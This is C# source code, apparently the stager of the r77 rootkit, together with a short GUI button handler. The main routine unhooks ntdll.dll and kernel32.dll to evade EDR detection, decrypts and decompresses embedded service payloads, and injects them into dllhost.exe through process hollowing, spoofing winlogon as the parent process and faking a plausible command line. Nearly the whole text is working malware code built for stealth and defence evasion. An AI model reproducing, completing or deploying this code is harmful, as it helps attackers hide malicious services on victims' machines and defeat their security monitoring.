// The target framework is .NET 3.5. // Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start. // However, the target framework is not relevant in the powershell context. // The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed. // To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5. public static void Main() { // Unhook DLL's that are monitored by EDR. // Otherwise, the call sequence analysis of process hollowing gets detected and the stager is terminated. Unhook.UnhookDll("ntdll.dll"); if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == 8) { // Unhooking kernel32.dll on Windows 7 x86 fails. //TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails. Unhook.UnhookDll("kernel32.dll"); } Process.EnterDebugMode(); // Get r77 service executable. byte[] payload32 = Decompress(Decrypt(Resources.InstallService32)); byte[] payload64 = Decompress(Decrypt(Resources.InstallService64)); // Executable to be used for process hollowing. string path = @"C:\Windows\System32\dllhost.exe"; string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe"; string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect). // Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required. int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id; // Create the 32-bit and 64-bit instance of the r77 service. if (Helper.Is64BitOperatingSystem()) { if (IntPtr.Size == 4) { RunPE.Run(pathWow64, commandLine, payload32, parentProcessId); } else { RunPE.Run(path, commandLine, payload64, parentProcessId); } } else { RunPE.Run(path, commandLine, payload32, parentProcessId); } }
private void unhookBtn_Click(object sender, EventArgs e) { Unhook.Do(); UpdateGui(); }